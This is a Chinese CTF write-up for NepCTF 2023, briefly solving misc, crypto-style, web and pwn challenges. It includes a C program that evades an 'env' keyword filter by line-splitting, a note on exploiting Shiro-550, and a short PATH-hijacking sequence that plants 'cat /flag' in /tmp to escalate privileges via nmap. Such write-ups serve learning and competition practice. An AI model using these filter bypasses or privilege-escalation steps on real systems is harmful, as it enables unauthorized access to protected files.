nepctf-2023

NepCTF-2023

之前的比赛,懒惰的我现在才整理wp

misc

问卷

你猜猜你猜猜

CheckIn

真签到

NepCTF{H4ve_Fun_1N_This_Game}

codes

环境env要

1
en\v绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>

extern char **en\
viron;

int main()
{
    int i = 0;
    while (en\
viron[i] != NULL)
    {
        printf("%s\n", en\
viron[i]);
        i++;
    }

    return 0;
}

与AI共舞的哈夫曼

hint :年轻人就要年轻,正经人谁自己写代码

拿去让gpt写脚本即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
import heapq
import os

class HuffmanNode:
    def __init__(self, char, freq):
        self.char = char
        self.freq = freq
        self.left = None
        self.right = None

    def __lt__(self, other):
        return self.freq < other.freq

def build_huffman_tree(frequencies):
    heap = [HuffmanNode(char, freq) for char, freq in frequencies.items()]
    heapq.heapify(heap)

    while len(heap) > 1:
        left = heapq.heappop(heap)
        right = heapq.heappop(heap)
        merged = HuffmanNode(None, left.freq + right.freq)
        merged.left = left
        merged.right = right
        heapq.heappush(heap, merged)

    return heap[0]

def build_huffman_codes(node, current_code, huffman_codes):
    if node is None:
        return

    if node.char is not None:
        huffman_codes[node.char] = current_code
        return

    build_huffman_codes(node.left, current_code + '0', huffman_codes)
    build_huffman_codes(node.right, current_code + '1', huffman_codes)

def compress(input_file, output_file):
    with open(input_file, 'rb') as f:
        data = f.read()

    frequencies = {}
    for byte in data:
        if byte not in frequencies:
            frequencies[byte] = 0
        frequencies[byte] += 1

    root = build_huffman_tree(frequencies)
    huffman_codes = {}
    build_huffman_codes(root, '', huffman_codes)

    compressed_data = ''
    for byte in data:
        compressed_data += huffman_codes[byte]

    padding = 8 - len(compressed_data) % 8
    compressed_data += '0' * padding

    with open(output_file, 'wb') as f:
        # Write frequency information
        f.write(bytes([len(frequencies)]))
        for byte, freq in frequencies.items():
            f.write(bytes([byte, (freq >> 24) & 0xFF, (freq >> 16) & 0xFF, (freq >> 8) & 0xFF, freq & 0xFF]))

        # Write compressed data
        for i in range(0, len(compressed_data), 8):
            byte = compressed_data[i:i+8]
            f.write(bytes([int(byte, 2)]))


def build_huffman_tree_from_bytes(frequencies):
    heap = [HuffmanNode(byte, freq) for byte, freq in frequencies.items()]
    heapq.heapify(heap)

    while len(heap) > 1:
        left = heapq.heappop(heap)
        right = heapq.heappop(heap)
        merged = HuffmanNode(None, left.freq + right.freq)
        merged.left = left
        merged.right = right
        heapq.heappush(heap, merged)

    return heap[0]

def decompress(input_file, output_file):
    with open(input_file, 'rb') as f:
        frequencies_count = ord(f.read(1))
        frequencies = {}

        for _ in range(frequencies_count):
            byte = ord(f.read(1))
            freq = (ord(f.read(1)) << 24) + (ord(f.read(1)) << 16) + (ord(f.read(1)) << 8) + ord(f.read(1))
            frequencies[byte] = freq

        root = build_huffman_tree_from_bytes(frequencies)

        huffman_codes = {}
        build_huffman_codes(root, '', huffman_codes)
        reverse_huffman_codes = {v: k for k, v in huffman_codes.items()}

        decompressed_data = bytearray()
        code = ''
        while True:
            byte = f.read(1)
            if len(byte) == 0:
                break

            byte = ord(byte)
            for i in range(7, -1, -1):
                if byte & (1 << i):
                    code += '1'
                else:
                    code += '0'

                if code in reverse_huffman_codes:
                    decompressed_data.append(reverse_huffman_codes[code])
                    code = ''

    with open(output_file, 'wb') as f:
        f.write(decompressed_data)


if __name__ == "__main__":
    # input_file = 'input.txt'
    compressed_file = 'compressed.bin'
    decompressed_file = 'decompressed.txt'

    # 压缩文件
    # compress(input_file, compressed_file)

    # 解压缩文件
    decompress(compressed_file, decompressed_file)

ConnectedFive

和ai下五子棋,慢慢下就好了多连甚至能得多分

42分就可以拿到flag

陌生的语言

flag翻译就是下面这句话,原陌生的语言也是其中的

小叮弹钢琴

歪脖子看的mos

解完,转小写,大写解密的时候是乱码

youshouldusethistoxorsomething

歪脖子看的0x

0x370A05303C290E045005031C2B1858473A5F052117032C39230F005D1E17

你也喜欢三⽉七吗

Nepnep星球如约举办CTF大赛,消息传播至各大星球,开拓者一行人应邀而来 ———————————————————————————————————————

三月七:耶,终于来到Nepnep星球啦,让我看看正在火热进行的Hacker夺旗大赛群聊。啊!开拓者,这群名看起来怪怪的诶。 (伸出脑袋,凑近群名,轻轻的闻了一下)哇,好咸诶,开拓者你快来看看!

开拓者(U_id):(端着下巴,磨蹭了一下,眼神若有所思)这好像需要经过啥256处理一下才能得到我们需要的关键。

三月七:那我们快想想怎么解开这个谜题!

flag格式:NepCTF{+m+}

hint:URL为压缩包密码

题目

1
2
3
4
salt_lenth= 10 
key_lenth= 16 
iv= 88219bdee9c396eca3c637c0ea436058 #原始iv转hex的值
ciphertext= b700ae6d0cc979a4401f3dd440bf9703b292b57b6a16b79ade01af58025707fbc29941105d7f50f2657cf7eac735a800ecccdfd42bf6c6ce3b00c8734bf500c819e99e074f481dbece626ccc2f6e0562a81fe84e5dd9750f5a0bb7c20460577547d3255ba636402d6db8777e0c5a429d07a821bf7f9e0186e591dfcfb3bfedfc

根据描述

群名:NepCTF2023

正好十位猜测为盐,sha256一下

dd8e671df3882c5be6423cd030bd7cb69671ef27dfe7a541903edc4e23168009

访问是个图片

星穹铁道文!(

NepCTF{HRP_aiways_likes_March_7th}

web

ez_java_checkin

Shiro 550的洞,梭

flag在start.sh里,属于非预期解,正解是提权拿到flag

也不排除就是这个考点(

独步天下-转生成为镜花水月中的王者

echo “cat /flag” > /tmp/ports-alive

export PATH=/tmp:$PATH

chomd 777 /tmp/ports-alive

nmap -h

PWN

HRP-CHAT-4

Login进去后去Shop一直买0元商品

让主线程内存溢出到子线程

满足if之后

拿到flag